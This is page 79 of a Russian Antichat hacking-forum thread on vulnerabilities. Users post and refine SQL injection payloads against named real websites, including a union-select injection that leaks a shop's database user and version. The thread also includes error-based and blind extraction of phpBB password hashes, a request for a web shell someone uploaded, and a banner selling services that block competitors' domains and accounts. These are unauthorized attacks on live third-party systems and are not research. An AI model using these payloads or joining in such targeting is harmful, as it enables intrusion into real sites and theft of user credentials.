Ваши вопросы по уязвимостям.

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 79 из 296

Опции темы

Поиск в этой теме

Опции просмотра

#781

26.10.2015, 15:13

segodnya

Новичок

Регистрация: 26.10.2015

Сообщений: 8

С нами: 5552246

Репутация: 0

Цитата:

Сообщение от Br@!ns

↑
А сами не умеете вообще? учитесь.
http://stop-obman.ru/organizations....*/from/**/user/**/where/**/role='root'))))='1
пароль есть на cmd5
админка по адресу stop-obman.ru/backend будет

спасибо большое, а вы как я вижу шелл залили? если можно в лс дайте.

да тренируюсь на Linux kali, читаю. учусь.

и еще вопрос, это точно md5 да ?

#782

26.10.2015, 16:21

xivi00

Познающий

Регистрация: 23.11.2013

Сообщений: 46

С нами: 6563126

Репутация: 0

есть тут что нибудь https://smartwm.ru/login-with-social/'

#783

26.10.2015, 16:41

xivi00

Познающий

Регистрация: 23.11.2013

Сообщений: 46

С нами: 6563126

Репутация: 0

Цитата:

Сообщение от SaNDER

↑
если этот 404,то там скорее всего нечего нету .

там 500

#784

26.10.2015, 17:57

BabaDook

Познавший АНТИЧАТ

Регистрация: 09.05.2015

Сообщений: 1,066

С нами: 5797046

Репутация: 40

Цитата:

Сообщение от xivi00

↑
там 500

ахринеть , о чём говорить 500 ошибка ?

#785

26.10.2015, 18:06

}{@ker

Новичок

Регистрация: 27.04.2007

Сообщений: 4

С нами: 10021654

Репутация: 1

phpMyAdmin/scripts/setup.php.Что можете посоветовать?

http://s020.radikal.ru/i723/1510/c2/4993371de002.png

Еще раз,извиняюсь.

#786

27.10.2015, 00:53

BabaDook

Познавший АНТИЧАТ

Регистрация: 09.05.2015

Сообщений: 1,066

С нами: 5797046

Репутация: 40

Цитата:

Сообщение от SaNDER

↑
shop.faberlic.com/ru/component/consultant/conscontent?layout=edit&idcontenttype=3&returnurl= aHR0cDovL3Nob3AuZmFiZXJsaWMuY29tL3VhL2NvbnNjYXJlZX I=
без всякой авторизации...но при сохрании ошибка CC_SYSTEM_ERROR
http://shop.faberlic.com/component/...vL3Nob3AuZmFiZXJsaWMuY29tL3VhL2NvbnNjYXJlZXI=
пытался XSS юзануть но выводит "alert . Есть идеи?
тут скул ошибка,но я тут не чего,не понятно .
http://shop.faberlic.com/component/catalog?id[]=1000243641377&view=seriesitem
http://shop.faberlic.com/component/...&sort=&taskaction=getlistgoods&view=listgoods

Случайно сканер не ахунейтик? ошибки из-за []

#787

27.10.2015, 16:17

Br@!ns

Постоянный

Регистрация: 03.09.2010

Сообщений: 885

С нами: 8258006

Репутация: 25

Цитата:

Сообщение от xivi00

↑
подскажите есть ли тут вообще уязвимость
http://www.regard.ru/ajax/check_order.php?num=4444'
все что можно перепробовал продвижений нет(

С твоей непонятно, но есть другая:

http://www.regard.ru/comparen.htm?i...Value(1,concat(0x3a,(select(versi on())))))='1

или

http://www.regard.ru/comparen.htm?id=e345280615ca44adab458f949c114de1a' +union+select+1,user()+--+

regard@localhost

5.5.44-0+deb7u1-log

Вывод в самом низу страницы (проще в коде глянуть)

#788

27.10.2015, 16:40

Konqi

Постоянный

Регистрация: 24.06.2009

Сообщений: 542

С нами: 8885780

Репутация: 672

Цитата:

Сообщение от Br@!ns

↑
С твоей непонятно, но есть другая:

там тоже работает, если передать массив вместо строки.

2 all. перестаньте постить нераскрученные скули и отчеты ваших сканеров. старайтесь все делать сами, а если что то и не выходит то опишите конкретно проблему, что именно не получаеться.

#789

27.10.2015, 17:50

qaz

Познавший АНТИЧАТ

Регистрация: 12.07.2010

Сообщений: 1,546

С нами: 8334326

Репутация: 75

Цитата:

Сообщение от psihoz26

↑
https://rdot.org/forum/showpost.php?p=36186&
Тут есть пример эксплуатации

1) почитал обе статьи (http://www.securitylab.ru/news/470546.php)

есть проблемы, например при запросе

Цитата:

Сообщение от None

+procedure+analyse(extractvalue(rand(),concat(0x3a ,version())),1)--+

пишет

Цитата:

Сообщение от None

FUNCTION dbphoto.extractvalue does not exist

как то решается эта проблема?

2) нашел нужные мне таблицу и колонку

Цитата:

Сообщение от None

+procedure+analyse((select+user_password+from+foru m.phpbb_users+limit+1,1),1)--+

тоесть ответ

Цитата:

Сообщение от None

Описание ошибки: Incorrect parameters to procedure 'analyse'

зх как составить запрос чтобы хотяб через блинд вывести данные

#790

27.10.2015, 19:08

~~faza02~~

Banned

Регистрация: 21.11.2007

Сообщений: 181

С нами: 9721141

Репутация: 1013

Цитата:

Сообщение от qaz

↑
1) почитал обе статьи (
http://www.securitylab.ru/news/470546.php
)
есть проблемы, например при запросе
пишет
как то решается эта проблема?
2) нашел нужные мне таблицу и колонку
тоесть ответ
зх как составить запрос чтобы хотяб через блинд вывести данные

у вас версия ниже 5.1, используйте другой error-based вектор

Страница 79 из 296

« Предыдущая тема | Следующая тема »

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

Внести депозит

Депозит создан

Вывести депозит